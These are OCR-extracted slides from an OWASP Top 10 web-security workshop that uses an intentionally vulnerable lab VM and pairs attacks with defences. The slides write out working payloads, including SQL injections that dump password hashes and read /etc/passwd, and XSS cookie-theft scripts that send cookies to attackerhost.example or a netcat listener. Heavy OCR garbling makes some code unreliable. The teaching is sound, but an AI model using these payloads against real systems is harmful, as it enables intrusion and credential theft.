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INTRODUCTION

EXPECTATIONS

» Audiences
» Concept Driven Approach

» Packed with Examples, Exercises and Anecdotes



STUFF I HAVE TO SAY

STUFF | HAVE TO SAY

» Opinions expressed here are mine and not that of my
employer

» Lot of examples of breaches and vulnerabilities. They are
not an indicator of security of the organization affected or
of the application



DOWNLOAD VULNERABLE VM

INTENTIONALLY VULNERABLE APP

» You can download the intentionally vulnerable VM for this class from
here:

» http://bit.ly/2yVWEFI2

» Additional tools, etc can be found in the VM used for my DEFCON 25
workshop:

» https://github.com/abhaybhargav/defcon_intro

» These are Intentionally Vulnerable apps deployed on vulnerable
Operating Systems and should not be deployed on a network. | am not

responsible for any damage that occurs if/when you use these
materials


http://bit.ly/2yVWFI2
https://github.com/abhaybhargav/defcon_intro

LOTS OF DEMOS!

Demo Gods! Please let this work!



AGENDA: APPSEC ESSENTIALS

AGENDA

» Introductions
» Quick overview of some OWASP Projects

» View of the OWASP Top 10

» Vulnerabilities and Countermeasures



OWASP

THE OWASP

» Open Web Application Security Project
» Not-For-Profit organization with chapters all over the world
» Multiple Projects - Tools, KnowledgeBases, Documents, etc

» Multiple Events/Conferences all over the world



OWASP PROJECTS

OWASP PROJECTS 1 USE

» OWASP Top 10

» OWASP ZAP - Vulnerability Scanner for Web Applications
» OWASP Proactive Controls

» OWASP Application Security Verification Standard

» OWASP CheatSheets

» There are tons more...



OWASP TOP 10

OWASP TOP 10

1 .Injection

2 .Broken Authentication and Session Management
3 .Cross Site Scripting

4 .\nsecure Direct Object Reference

S .Security Misconfiguration

6.Sensitive Data Exposure

/ .Missing Function Level access control

8.Cross Site Request Forgery

9.Using Components with Known Vulnerabilities

10.Unvalidated Requests and Forwards



INJECTION



TYPICAL SQL INJECTION ATTACK

SOmeValue’ Op 12211 ‘

Attacker

DB



EXPLANATION: SQL INJECTION

http://www.e—-commerce.com/item/subcat.php?
cat 1d=2228

SELECT cat 1d,

cat_name FROM list of all categories
Product Cats WHERE are retrieved

cat 1d = 2228

http://www.e-commerce.com/item/
subcat.php?cat i1d=2228" OR ‘'1’'= 'l

SELECT cat id, cat name FROM product Cats
WHERE cat id = 2228 OR ‘'l1’ = ‘1


http://www.apnafaida.com/item/subcat.php?cat_id=2228
http://www.apnafaida.com/item/subcat.php?cat_id=2228
http://www.apnafaida.com/item/subcat.php?cat_id=2228
http://www.apnafaida.com/item/subcat.php?cat_id=2228

SOME MORE SQL INJECTION QUERIES

http://www.e-commerce.com/item/

subcat.php?cat id=2228 UNION SELECT

username, password FROM USERS

http://www.e-commerce.com/

item/subcat.php?

cat 1d=2228 AND DROP TABLE

PRODUCTS;

SELECT cat id,

SELECT cat 1id,

cat name FROM
product Cats WHERE
cat id = 2228 UNION
SELECT username,
password FROM USERS

cat_name

FROM product Cats WHERE
cat id = 2228 AND DROP

TABLE PRODUCTS;


http://www.apnafaida.com/item/subcat.php?cat_id=2228
http://www.apnafaida.com/item/subcat.php?cat_id=2228
http://www.apnafaida.com/item/subcat.php?cat_id=2228
http://www.apnafaida.com/item/subcat.php?cat_id=2228
http://www.apnafaida.com/item/subcat.php?cat_id=2228
http://www.apnafaida.com/item/subcat.php?cat_id=2228
http://www.apnafaida.com/item/subcat.php?cat_id=2228

ADVANCED SQL INJECTION

» Executing Commands on the Backend Operating System

» EXEC master.dbo.xp cmdshell ‘'DIR’

» Writing files and reading files from backend operating
system

» UNION SELECT LOAD_FILE(‘/etc/paSSWd’)

) UNION SELECT ‘File Content’ INTO OUTFILE
‘tmp/file’



ADVANCED SQL INJECTION VECTORS

website.php wid=l+tor+1=(%2f**$2fsE1EcT+1+

G2t **S2ffRoOM (52f**S52fsE1EcT+count (*),

T2t **F2fcOnCaT ( (S2f**F2fsE1IECT ($2£**%2fsE1ECT (%
2% *F2fsE1IECT+32f**%2fcOnCaT (0x217e21, count (0),
0x217e2l)+52ft**52ffRoM+1information schema.

SO f**%0 fFSChEMAtA+%2 f**%2 fwHeRe+not+
52f**52fsChEmA NaMe=0x0690bebb0f/20dol/4090foe5f/
3063086560d61l))+52f**s2ffRoM+1information schema.
S2E**F2ftAbLeS+

$2f**%2f1ImIt+0,1), floor (rand(0) *2))x
s2f**32ffRoM+1information schema.%s2f**% 2ftAbLeS+
52 *52fgRoUps2£**% 2be+x) ) tand+1=1&event=wr



ADVANCED SQL INJECTION VECTORS

website.php wid=l+tor+1=(%2f**$2fsE1EcT+1+
S2f**S2ffRoM (52f**%52fsE1EcT+count (*),
$2t**%52fcOnCaT ( ($2f**S2EfsE1ECT ($2f**%2fsE1ECT (%
2E**S2fsE1ECcT+%2f**%2fcOnCaT (0x217e21, count (0),
0x217e2l)+52ft**52ffRoM+1information schema.

SO f**%0 fFSChEMAtA+%2 f**%2 fwHeRe+not+
$2f£**52E£sChEmA NaMe=0x696e666£726d6174696f6e5£f7
36368656d61) ) +32f**3S2ffRoM+information schema.
S2E**F2ftAbLeS+

$2f**%2f1ImIt+0,1), floor (rand(0) *2))x
s2f**32ffRoM+1information schema.%s2f**% 2ftAbLeS+
521t **S2fgRoUpS2E**% 2be+x) ) tand+1=1&event=wr



OWASP TOP 10: INJECTION FLAWS

CASE IN STUDY - ABC MANUFACTURING CO




OWASP TOP 10: INJECTION FLAWS

SOME FACTS - ABC MANUFACTURING COC

» Critical R&D Information

» Multiple Locations - Mature IT Deployment

» Custom Web Apps and SAP Deployment

» Private MPLS Cloud with multiple Network deployments

» Tested multiple times over for security, but IT Management
unsatisfied with results



OWASP TOP 10: INJECTION FLAWS

OUR GOAL

» Get access to critical R&D Information of ABC Manufacturing -
externally AND/OR Internally

» Use all methods to gain access to critical R&D Information

» Simulate EVERYTHING close to an real attacker as possible



OWASP TOP 10: INJECTION FLAWS

THE INCURSION...

SQL Injection

DB

Client’s Custom Web

App - HR Backend Database - HR

The Database was running as ‘root’

Some interesting features were enabled.....



OWASP TOP 10: INJECTION FLAWS

THE ATTACK...

» Compromising the public facing web application and database
» MSSQL - XP-CMDShell

» Root Access on the Windows Server

» Using exploits to elevate privileges to Domain Administrator

» Logging into the R&D Server with “Domain Admin” Credentials

» Complete Compromise of Critical R&D Information
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SQAL INJECTION WITH POSTGRES DB

» Force Errors
» Identify SQL Injection

» Exploit SQL Injection



FORCE ERRORS

» Login to the app as betty.ross@we45.com with password:
“cwasp”

» Once you get to the Dashboard, change the URL in the
address bar to http://localhost/tests/

» The Search Param is potentially vulnerable to SQL Injection
» Let's test with a simple single quote test

» Enter the payload: abcd’


mailto:betty.ross@we45.com
http://localhost/tests/

YOU SHOULD SEE.. ..

\\(- @ localhost/tosts/ v & || Q search | B G- || 4 &% © @ »- =

Page not found (104

Roqut}t Method: POST
Request URL: http:/Mccalhostitests/
Raised by: cllviews.list Lesls

You're seeing this errnr herause you have DTG - True in your Django sethings file. Change that to "a1se, and Django will display a stancard 404 pags.

This is very useful for the attacker.

Now the attacker knows that the application is vulnerable to SQLi



LET'S EXTRACT INFO FROM THE DB

» Let's fetch the DB Version
» Notice that a regular query returns 2 columns

» We can attempt to perform UNION queries with 2
Columns

» Let’s try this:

» abcd' UNION ALL SELECT NULL, (SELECT version())--



LET'S FETCH THE CURRENT DB USER

» PostGres Query for current DB User are the user and
current_user variables and the getpgusername()

function:

» abcd' UNION ALL SELECT NULL, (SELECT user)--

» abcd’ UNION ALL SELECT NULL, (SELECT
current_user)-—

» abcd’ UNION ALL SELECT NULL, (SELECT
getpgusername())--



FETCH CURRENT DATABASE

» PostGres Current Database - uses the current_database()
function

» abcd’ UNION ALL SELECT NULL, (SELECT
current _database())--



EXTRACTING SOME DATABASE SETTINGS

» Attackers use this to elevate privileges into the system

» They use the current_settings() method with the settings
parameter.

» Fetch Port Info:

» abcd' UNION ALL SELECT NULL, (SELECT
current_setting('port'))--

» Fetch Password Encryption Status:

» abcd’' UNION ALL SELECT NULL, (SELECT
current_setting('password encryption'))--



MORE SETTINGS

» Extract Config File:

» abcd' UNION ALL SELECT NULL, (SELECT
current_setting(‘config_file'))--

» Host Based Authentication File:

» abcd' UNION ALL SELECT NULL, (SELECT
current _setting(‘hba file'))--

» Fetching Data Directory:

» abcd' UNION ALL SELECT NULL, (SELECT
current_setting('data_directory'))--



FETCH ALL DB USERS AND PASSWORDS

» Fetch all DB users and passwords:

» abcd’ UNION ALL SELECT NULL, (SELECT
concat(usename,' : ',passwd) from pg shadow)--



FETCH ALL TABLE NAMES FROM DB

» Fetch Table Names:

» abcd’ UNION ALL SELECT NULL, (SELECT
string agg(table name,', ') AS tables list FROM
information_ schema.tables WHERE table schema =
'public')--



FETCH COLUMNS FROM USER TABLE

» Fetch columns from User Table:

» abcd’ UNION ALL SELECT NULL, (SELECT
string agg(column name,', ') AS columns list
FROM information_schema.columns WHERE
table schema = "public’ AND table name =
‘ctf user')--



FETCH USERS AND PASSWORD HASHES FROM TABLE

» fetch Users and password hashes:

» abcd' UNION ALL SELECT NULL, (SELECT
concat(email,' : ',password) FROM
public.ctf user where id=2)-

» Extra Credit



LET'S LOOK AT THE VULNERABLE CODE

» Terminal:
» cd /webapps/ctf2/hospital/ctf/
» mousepad views.py
» View > Line Numbers

» goto line: 300



QUERIES

EXAMPLE

String username =
request.getParameter (“username”) ;

String gry = “SELECT acct bal from users
WHERE username = 27

PreparedStatement pst =
connection.prepareStatement (qry) ;

pst.setString(l,username) ;



QUERIES

HOW PREPARED STATEMENT WORKS...

Prepare

¢ Query with “?” for

parameters

Optimize :

Execute

Parse, Compile,
Optimize

Store result without
execution

e Application binds

params subsequently

e Execution with multiple

values as necessdary




QUERIES

PREPARED STATEMENTS - PLATFORMS

» PHP
=»$STH = $DBH->prepare("SELECT * FROM users WHERE id = :id");
=$STH->bindParam(':id', '1', PDO::PARAM STR);

e ASP.NET

=string commandText = “SELECT name from customers WHERE
CustomerID = @ID;”;

=5SglCommand command
connection);

new SglCommand(commandText,

=command.Parameters.Add("@ID", SqlDbType.Int);

=command.Parameters["@ID"].Value = customerlID;


http://ASP.NET

PROTECTING AGAINST SQL INJECTION

» Validate Data that makes contact with the DB
» Always Always run Parameterized Queries
» Harden the DB, never run with privileged roles/users

» Consider using ORMs (validated) to protect against SQL
Injections



SERVER-SIDE JAVASCRIPT INJECTION

» Remote-Code Execution Flaw in NodeJS apps
» Typically happens with the use of: eval () in JavaScript

» Similar to Command Injection where the user’s input
intermingles with the Server-side process/OS runtime



SERVER-SIDE JAVASCRIPT INJECTION

res.end(require( ‘fs').readdirSync('."').toString())

process.kill(process.pid)




SERVER-SIDE JAVASCRIPT INJECTION - DEMO



SERVER-SIDE TEMPLATE INJECTION

html
lang=

My Webpage
id=
{% for item in navigation %}

href= {{ 1tem.caption }}
{%$ endfor %}

My Webpage
{{ a variable }}

{# a comment #}




SERVER-SIDE TEMPLATE INJECTION

» Developers use popular templating systems to render
server-side variables to client-side content on web pages/

emails/etc

» When user input intermingles with misconfigured/
unvalidated template variables, could trigger Template

Injection

» Template Injection can lead to Remote Code Execution



SERVER-SIDE TEMPLATE INJECTION DEMO



PROTECTING AGAINST INJECTION ATTACKS - TIPS

» Validate Input with fanatic discipline
» Use Safe APl to make OS commands

» Avoid user input directly interacting with template
variables

» Restrict File System permissions and Access Controls on
backend Operating Systems to reduce attack surface



CROSS SITE
SCRIPTING (XSS)



CROSS SITE SCRIPTING

» Same Origin Policy
» Cross Site Scripting
» Consequences

» Examples

» Exercise



XSS - EXECUTION

Interprets

input as html

¢2sCf

Attacker

Legit User

®Session Hijacking
®Browser Hooking
®User Account Access
®Denial-of-Service

e Malicious Redirection



CROSS SITE SCRIPTING ATTACKS

» Session Hijacking
» Phishing

» Hooking User’s computers and browsers using JavaScript
Malware

» Denial Of Service
» URL Redirection to Malware Site

» Defacement



TYPES OF XSS

» Reflected XSS

» XSS that is entered in an application’s input that is immediately reflected
back to the user.

» Persistent XSS

» XSS that is stored in a Database or filesystem and executes everytime a
page or functionality is called by the user

» DOM Based XSS
» “Type-0" XSS. Relies on manipulation of the DOM Objects on the browser

» Attack does not even reach the server



VARIABLES OF XSS

» Difficult to prevent, because of execution on client side
» Different browsers, different behavior

» Focus on Server-Side and Code



XSS ATTACK EXAMPLE

<seript>XS$</seript>
{_*
XSS Found in the BeEF to hook and

“Forum” Functionality
of the Application

control user browsers
through executed
JavaScript

Legit §
User




XSS PAYLOADS

) <script>alert(l)</script>

» <script>alert (document.cookie)</script>
» Javascript:alert (1)

» alert (1)

» ><scr ipt>alert(l)</s cri pt>

» <BODY ONLOAD=alert('XSS')>

» <BODY ONLOAD=document.location = ‘http://
www.evil.com’ >


http://www.evil.com
http://www.evil.com

EVASIVE XSS

» Encoded:
$3C%73%63%72%69%70%574%3E%64%6F%$63%75%6D%65
6EST4%2E%56C356F363%61%74%69%6F$6E$3D%27%68%74%74%70
$3A%2F%$2F%61%574%74%61%63%6B%$65%72%68%6F%73%74%2E%65
%78%61%56D%70%6C$65%2F%63%567%569%2D%62%569%6ES2F%63%6F
$6F%$6B%$69%65%73%74%565%61%6CS2E%$63%67%569%3F%27%2B%64
%$6F%$63%75%6D%65%6E%574%2E%$63%6F%$6F36B369%65%3C%2F%73
%$63%72%69%70%74%3E

» Literally, decodes to:

<script>document.location='http://attackerhost.example/cgi-

bin/cookiesteal.cgi?'+document.cookie</script>


http://attackerhost.example/cgi-

REFLECTED CROSS SITE SCRIPTING

» Typically triggered via Social Engineering Attacks
» Variety of Attack Possibilities:

» Session Hijacking

» Malicious redirection

» IFrame Injection



REFLECTED XSS

» Login as bruce.banner@we45.com

» Goto: http://localhost/patients/

» Enter a simple XSS Vector in the Search bar

» <script>alert(document.cookie)</script>


mailto:bruce.banner@we45.com
http://localhost/patients/

REMOTE ATTACKER - SESSION HIJACKING USING XSS

» Ingredients:
» netcat listener on our (attacker) system

» user who's been lured into the attack using social
engineering



LET'S SETUP THE ATTACK

» netcat listener
» open terminal

» type:while true; do { echo -e "HTTP/1.1 200
OK\r\n'; } | nc -1 -p 1337 -g 1 ; done

» leave it running



RUN THE XSS ATTACK

» Run the XSS Attack with this payload:

» <script>var one="http://127.0.0.1:1337/
index.html?cookie=";var
two=document.cookie;document.location=one.conca

t(two);</script>
» Observe the netcat terminal screen....
» Goto views.py > Line 366

» What's wrong with the code?



PERSISTENT CROSS SITE SCRIPTING

» Typically used against other users or administrative users

» Attacker loads the XSS payload into a field that stores the
payload in the DB



PERSISTENT XSS

» Open the Browser
» Access the REST Client B

» Open up:

» http://localhost/api/CTF/patient/4/

» use the GET request


http://localhost/api/CTF/patient/4/

PAYLOAD - PERSISTENT XSS

» Copy the JSON Array

» Change the “name” field to the value
<script>alert(document.cookie)</script>

» Add a Header: Content-Type: application/json

» Use the PUT request and submit to the same URL

» Now login as bruce.banner@we45.com and go to the patient’s
section

» Extra Credit: Try the Session Hijacking Attack


mailto:bruce.banner@we45.com

PREVENTING CROSS SITE SCRIPTING

» Validate Input - with Fanatic Discipline
» Encode/Escape Output - HTML Escaping, JavaScript escaping

» Consider using Auto-escape Templating Systems - Angular Strict
Contextual Escaping/Go Templates/Jinja2/Django Templates (safe
mode)

» Implement Content-Security-Policy
» Add Session Flags - HttpOnly (prevents Client Side Token Access)

» X-Frame-Options - Ensures that iframes from outside the origin can’t
be loaded in the context of the application



USEFUL LIBRARIES - OUTPUT ESCAPING

» Java - OWASP Java Sanitizer
» Python - Bleach

» ASP.NET - Anti-XSS, HtmlSanitizer

» PHP - HTML Purifier
» JavaScript/Node.JS - Bleach

» Ruby - Rails SanitizeHelper


http://ASP.NET

USEFUL LIBRARIES - SECURITY HEADERS

» Twitter's SecurityHeaders for Ruby
» Flask Talisman for Python Flask

» Node.JS - Helmet

» asp.Net Core Security Headers



http://asp.Net

CONTENT SECURITY POLICY

» HTTP Response header that controls/whitelists execution
of client side code

» Supported by most modern browsers - IE11 and above (IE)

» Content-Security-Policy: "default-src 'self’;
script-src 'self'; img-src 'self'; frame-src
'self'"

» X-Content-Security-Policy: "default-src 'self’;
script-src 'self'; img-src 'self'; frame-src
'self'”



BROKEN AUTHENTICATION
AND SESSION
MANAGEMENT




WEAK ACCOUNT MANAGEMENT

ACCOUNT

CREATION
» Flawed Password Reset

Functionality
CHANGE
» Secret Questions and PASSWORD

Answers

PASSWORD

» Password Lockout Flaws RECOVERY

» Password Remember




OWASP TOP 10: AUTHENTICATION & SESSION

FLAWED PASSWORD RESET

» Password Questions tend to be easily found - publicly
» Simple Lookups of Google, LinkedlIn, etc may give details

» Secret Answers should be encrypted in storage and
transmission - Just like passwords



OWASP TOP 10: AUTHENTICATION & SESSION

PASSWORD RESET VULNERABILITIES

» Does it display the old password?

» Does it allow immediate change of password?



OWASP TOP 10: AUTHENTICATION & SESSION

FLAWED PASSWORD MANAGEMENT

» No Password Lockouts

» No mandated Password Change Requirements
» No Out of band password change notifications
» No Password Complexity enforcement

» Password Remember Functionality - Cached in Browser



TYPICAL SESSION MANAGEMENT FLAWS

» Weak Session Token - Easily Guessable

» Loosely Scoped Session Token

» PATH

» DOMAIN

» Expire and Max-Age
» Insecure Session Token:

» No HttpOnly

» No SECURE Flag

» No Session Timeout



AUTHENTICATION & SESSION MANAGEMENT

» Session Hijacking
» Session Fixation attacks

» VERB Tampering



BEST PRACTICES

SESSION “SET-COOKIE”

public void addCookie(HttpServletResponse response, Cookie cookie) {

setting 1

String name = cookie.getName();

String value = cookie.getValue();

int maxAge = cookie.getMaxAge();

String domain = cookie.getDomain(); (
String path = cookie.getPath();

boolean secure = cookie.getSecure();

// validate the name and value

ValidationErrorList errors = new ValidationErrorList();

String cookieName = ESAPI.validator().getValidInput("cookie name", name, "HTTPCookieName", 50, false, errors);
String cookieValue = ESAPI.validator().getValidInput("cookie value", value, "HTTPCookieValue", 5000, false, errors);

// 1f there are no errors, then set the cookie either with a header or normally
if (errors.size() == 0) {

1f ( ESAPI.securityConfiguration().getForceHttpOnlyCookies() ) {
String header = createCookieHeader(cookieName, cookieValue, maxAge, domain, path, secure);
addHeader(response, "Set-Cookie", header);

} else {
// Issue 23 - If the ESAPI Configuration is set to force secure cookies, force the secure flag on the cookie before

1t
cookie.setSecure( secure || ESAPI.securityConfiguration().getForceSecureCookies() );
response.addCookie(cookie);
ks
return;
ks

logger.warning(Logger.SECURITY_FAILURE, "Attempt to add unsafe data to cookie (skip mode). Skipping cookie and continuing.");



VERB TAMPERING

JBoss JMX Console Vulnerability - Standard
Security Is Not Enough !

On 20th October 2011 JBoss released a Security Alert, informing about the
existence of a worm which makes use of a security loophole in JBoss JMX
Console to attack servers out there in the web. According to this notice,

users running unsecured JMX consoles were vulnerable to this attack.

I've been running several |Boss Application Server instances exposed to
the web, but | always ensure that JMX Console and other management
features of |Boss are secured before exposing it to the web. | usually use the standard
Username/Password login module for authentication for these |Boss services (I know it's not very
secure, but that was sufficient). Initially when | was setting this up, | referred to this article from JBoss :
http://community.jboss.org/wiki/SecureTheJmxConsole [Note: Now it is updated to include the
additional steps to protect against this threat].



VERB TAMPERING - DEMO



CROSS SITE REQUEST
FORGERY (XSRF)



CSRF ATTACK EXAMPLE

- '
~ ~ e —— - -t P
— it e e e - — - —— — e retben — e —-—
~——— LR T e P L - — . -

www.bank.com/accounts/transfer.jsp?



http://www.bank.com/accounts/transfer.jsp?trTo=005301000201&amt=$2000.00
http://www.bank.com/accounts/transfer.jsp?trTo=005301000201&amt=$2000.00

WHERE CSRF GETS REALLY DANGEROUS

» CSRF works best against State Change Events
» Password Changes
» Router/Firewall Config Changes

» Account Transfers

» Admin CRUD Operations of any kind



CSRF IN THE WILD

Fm_ Unpatched Drupal flaws open websites to attacks o

Anyon January 7,2016 By Pierluigi Paganini hin g

attack ords

ronse |OActive has uncovered a number of serious -
vulnerabilities affecting the Drupal CMS that could be e ere oo
exploited to completely takeover the vulnerable websites.

)p 10 breaches of pers
A new vulnerability affecting Drupal could be exploited for code execution and database credentials itain 2015

theft (by Man-in-the-Middle), according to Fernando Arnaboldi, a senior security consultant working in

IOActive.

ow to evaluate passwol
Fernando Arnaboldi says that the vulnerabilities affect the way Drupal processes updates, anditisina anagers
wild since some time. Drupal updates are not encrypted when being transferred, and no authenticity is

verified, so that means that anyone in the same network of a potential victim can launch a man-in-the-

middle attack. latting and how is it a s
risk?



CSRF + XSS

» CSRF + XSS is a lethal combination
» Results in complete client-side control over the application

» Imagine being able to use malicious javascript to authorize
state change events

» Pretty scary right...??



CSRF - DEMO



REQUEST AUTHENTICATION

» Secure Random Token validated in each request
» Token stored in Session

» Light-weight and effective CSRF protection



CSRF PROTECTION - GET REQUEST

GET /index.php HTTP/1.1
{ Other Headers}

CSRFToken:dsfds22wef3scxcvfhrehsl23adasfd




CSRF PROTECTION - POST REQUEST

<input type=“"HIDDEN” name=“csrftoken”
value="adsal2l131zxxz4222134324">




CSRF PROTECTIONS WITH TOKENS

» Open your browser.

» Login as steve.jobs@we45.com

» Goto your Desktop and find the secure_pass_change.html
» Read the file.

» Open in browser. Run


mailto:steve.jobs@we45.com

CSRF PROTECTION

» Use CSRF Tokens in GET and POST requests
» Tokens must be validated for each request, no exceptions

» Watch out especially for Ajax Requests - Big Red Flag!



CSRF PROTECTIONS - PRACTICAL TIPS

» Use Anti-CSRF tokens for all HTTP requests to the
application - Unique Per User Person

» Validate Origin Header

» SameSite Session Token Header Support - (limited
support)



CSRF LIBRARIES

» Java - OWASP CSRFGuard
» PHP - OWASP CSRFProtector

» ASP.NET - RequestVerification Tokens

» NodeJS - CSRF Module
» Python - Django (built-in by default)

» Ruby - RequestForgeryProtection


http://ASP.NET

SECURITY
MISCONFIGURATION




COMMON CONFIG FLAWS

» Weak/Vendor Supplied Default Passwords

» Weak/Vendor Supplied Default Open Services
» Unnecessarily Open Services

» Information Disclosure - Common with Headers
» Lack of Security Updates

» Lack of Network Access Control - Firewall rules/ACLs



INSECURE CONFIGURATION - DEMO



LET'S ENUMERATE MONGO

» Now:

» hmap -sT -sC --script = mongodb-info -p27017
127.0.0.1

» nmap -sT -sC --script
p27017 127.0.0.1

mongodb-databases -

» What does this mean?



SECURITY OVER CONFIGURATIONS
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SECURE CONFIGURATION - THINGS TO WATCH

» Remove Vendor Supplied Default configs - passwords,
config parameters, etc.

» Disable unnecessary services on components
» Run Security Updates/Patches - with fanatic discipline
» Restrict Permissions - Configure Authorization

» Transmit sensitive information over encrypted channels
only



SECURE CONFIGURATION - THE UNCONVENTIONAL BITS

» logging network upwards - to application

» Use of consistent time across the population -
Standardized Time

» File Integrity Monitoring - Highly recommended as a
detective control



SOFTWARE - VULNERABLE
COMPONENTS



USING SOFTWARE WITH VULNERABLE COMPONENTS

» Web Applications - Collection of multiple libraries,
components and API

» Vulnerable Component might result in a Vulnerable Web
App

» All too common in current-day web apps



VULNERABILITIES IN POPULAR LIBRARIES

» Apache Commons Collections - Java Deserialization
Vulnerability

» OpenSSL Vulnerability - Heartbleed

» CMS - Massive effect - Wordpress, Drupal, Joomla Plugins
» Image Libraries - ImageMagick, LibTFF

» Font Libraries - Freetype

» Document Libraries - Adobe, etc.



APPROACH TO HANDLING SECURITY IN SOFTWARE LIBRARIES

» Maintain Inventory
» Subscribe to NVD/CVE feeds (MITRE, NIST)
» Twitter! - Awesome source to discover new vulnerabilities

» Patch proactively - before it becomes an incident



YES

Can you
customise the
component?




OWASP DEPENDENCY CHECKER

» Goto: /root/Downloads/dependency-check/bin

» Run ./dependency-check.sh -n --project HACME -s
~/Downloads/HacmeBooks/ -0 hacme.html -+ HTML

» Run: firefox hacme.html



INSUFFICIENT TLS



MISCONFIGURED TLS DEPLOYMENTS

» Downgrade Attack possibilities - negotiates over SSLv3

» The insecure "Set-Cookie” event



TEXT

SECURE CIPHER SUITES

TLS_ECDHE_ECDSA WITH AES 128 GCM_SHA256
TLS_ECDHE_ECDSA WITH_AES 256 _GCM_SHA384
TLS_ECDHE_ECDSA WITH AES 128 CBC_SHA
TLS_ECDHE_ECDSA WITH AES 256 CBC_SHA
TLS_ECDHE_ECDSA WITH_AES 128 CBC_SHA256
TLS_ECDHE_ECDSA WITH AES 256 CBC_SHA384
TLS_ECDHE_RSA_WITH AES 128 GCM_SHA256
TLS_ECDHE_RSA_WITH AES 256 GCM_SHA384
TLS _ECDHE_RSA_WITH AES 128 CBC_SHA
TLS_ECDHE_RSA_WITH AES 256 CBC_SHA
TLS_ECDHE_RSA_WITH AES 128 CBC_SHA256
TLS_ECDHE_RSA_WITH AES 256 CBC_SHA384
TLS_DHE_RSA WITH_AES 128 GCM_SHA256

TLS _DHE_RSA WITH AES 256 GCM_SHA384
TLS_DHE_RSA WITH AES 128 CBC_SHA
TLS_DHE_RSA WITH_AES 256 CBC_SHA

TLS DHE_RSA WITH AES 128 CBC_SHA256

TLS DHE_RSA WITH AES 256 CBC_SHA256




HSTS - A MORE SECURE ALTERNATIVE

Twitter

- http:/[twitter
https://twitter.co
- - — wrres

—~— HTTP




USER TYPES WWW.BANK.FOO

BROWSER IMPLICITLY EXTEND
TO HTTP://WWW.BANK.FOO

WWW.BANK.FOO

BROWSER RESOLVES NAME DNS cERVER
WWW . BANK.FOO ‘ 198.51.100.17

BROWSER CONTACTS GET/
198.51.100.17
ON PORT 80

198.51.100.17:80

‘ REDIRECTS TO HTTPS://...

BROWSER CONTACTS SSL CONNECT
1S98.51.100.17
ON PORT 443

198.51.100.17:443

‘ SERVER CERT

BROWSER VERIFIES IF CERT IS
SSL CONNECTION CORRECTLY

ESTABLISHED.

(A) CRYPTOGRAPHICALLY SANE
(B)SIGNED BY A TRUSTED CA

TRANSACTION CAN PR .
(C) CARRYING THE NAME SACTION C OCEED

PADLOCK IS GREEN.

WWW_BANK.FOO

HOW IT HELPS




TIPS - TRANSPORT LAYER SECURITY

» Disable Weak CipherSuites in the Web Server/Load
Balancer

» Disable anything below TLSv1.1
» Consider implementing HSTS (Strict Transport Security)
» Watch out for the "Set-Cookie” event

» Enable the SECURE flag on the Session Token



INSECURE DIRECT
OBJECT REFERENCE




INSECURE DIRECT OBJECT REFERENCE

» MVC Architecture of Web Applications revolves around
having business logic in the form of native objects called

'‘Models’

» Attackers manipulate these parameters by removing or
adding information

» Attackers add additional parameters sometimes by
guessing the parameters



INSECURE DIRECT OBJECT REFERENCE

Insecure
Direct

Object
g Reference

Primary K

Ke
Y Mass

(Query)

oo i Assignment




MASS ASSIGNMENT

public class User {
private String 1d;
private String email;
private String password;
private Boolean i1sAdmin;

//getters and setters for other fields



HOW IT HAPPENS

public static Result form() {

Form<User> filledForm = newUserForm.bindFromRequest() ;

USER CAN FORCE ISADMIN = TRUE AND COMMIT THE FORM,

MAKING HIM “ADMINISTRATOR”




RUBY'S MASS ASSIGNMENT

S1gnup
params | ]
= User.new (params |
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INSECURE DIRECT OBJECT REFERENCE

http://www.example.com/customer/acct?
loggedin=True&id=45674

http://www.example.com/customer/acct?
loggedin=True&id=45676



http://www.example.com/customer/acct?loggedin=True
http://www.example.com/customer/acct?loggedin=True
http://www.example.com/customer/acct?loggedin=True&id=45676
http://www.example.com/customer/acct?loggedin=True&id=45676

REAL WORLD SCENARIO

Google

hotel confirrations L

Coope Sewrwy T Poaiirg Luwiny

Step 1: Crafted Google Searches

BCROUG 1525639562 11 o conftimesd BGHDOC73258383647 oy L et
BCHOCO732563035472 7 cowfirmed AGANONTAORRAGAZATD. "
BCAOCOTA2563038473 f comfirmed BCAOO( 732565393847 3

BCH0ONT32563923474 . coufimed BOADOU P325539364 74 e
BCH#000732563932475  confirmed BCROUC7IZHRIEATS . apesyrizsamesn

Step 2: Enumerate a few Booking IDs Step 3: Pattern Match the ID valQes

frocrt Brastifulsoip

§F_mawe__ - T_miin_“:

Step 4: Write Automated Bot and
retrieve 3 million bookings in 12 hours



EXERCISE

» Login as betty.ross@we45.com

» Goto: Create Health Record > View Page Source

» Goto: /static/js/validator.js

» Copy the update() function to mousepad

» Copy the CSRF token to mousepad and paste it in csrf token for function
» write a different explanation

» Open Developer Console Firefox (Ctrl + Shift + K)

» paste in Console > run update(3)


mailto:betty.ross@we45.com

EXERCISE 2

» If all goes well, unauthorized user is now updated

» Logout as betty.ross@we45.com

» Login as steve.jobs@we45.com

» View the Health Records and check if your record has been
updated


mailto:betty.ross@we45.com
mailto:steve.jobs@we45.com

TIPS - INSECURE DIRECT OBJECT REFERENCE

» Authorization is a largely Architectural consideration
» Focus on testing Access Control - Enforcing User Permissions to objects on the system
» Test Authorization and Permissions extensively
» Use un-guessable maps to reference objects
» UUID4()
» Enforcement tends to be weak, esp:
» Web Services
» Web Sockets

» AJAX requests



BEST PRACTICES

AUTHORIZATION DECORATOR - ASPNET

[Authorize(Roles = "Admin, Super User")]
public ActionResult AdministratorsOnly()

{
¥

return View();


http://ASP.NET

BEST PRACTICES

RANDOM,UNIQUE PRIMARY KEY MAPS

import java.util.UUID;
public class GenerateUUID {

public static final void main(String... aArgs){
//generate random UUIDs
UUID idOne = UUID.randomUUID();
UUID idTwo = UUID.randomUUID();
log("UUID One: " + idOne);
log("UUID Two: " + 1dTwo);



BEST PRACTICES

RANDOM,UNIQUE - METHOD 2

SecureRandom prng = SecureRandom.getInstance("SHA1PRNG");

//generate a random number
String randomNum = new Integer(prng.nextInt()).toString();

//get its digest

MessageDigest sha = MessageDigest.getInstance("SHA-1");
byte[] result = sha.digest(randomNum.getBytes());

System.out.println("Random number: " + randomNum);
System.out.println("Message digest: " + hexEncode(result));



USEFUL LIBS - INSECURE DIRECT OBJECT REFERENCE

» Java - Apache Shiro, OWASP ESAPI

» ASP.NET - Authorize Decorator

» Python, Django - Django Guardian
» Ruby - Rolify, CanCan
» NodelJs - Authorization, Node-ACL

» PHP - PHP-Auth


http://ASP.NET

INSECURE
CRYPTOGRAPRIC STORAGE




SENSITIVE DATA - WEAK CRYPTO

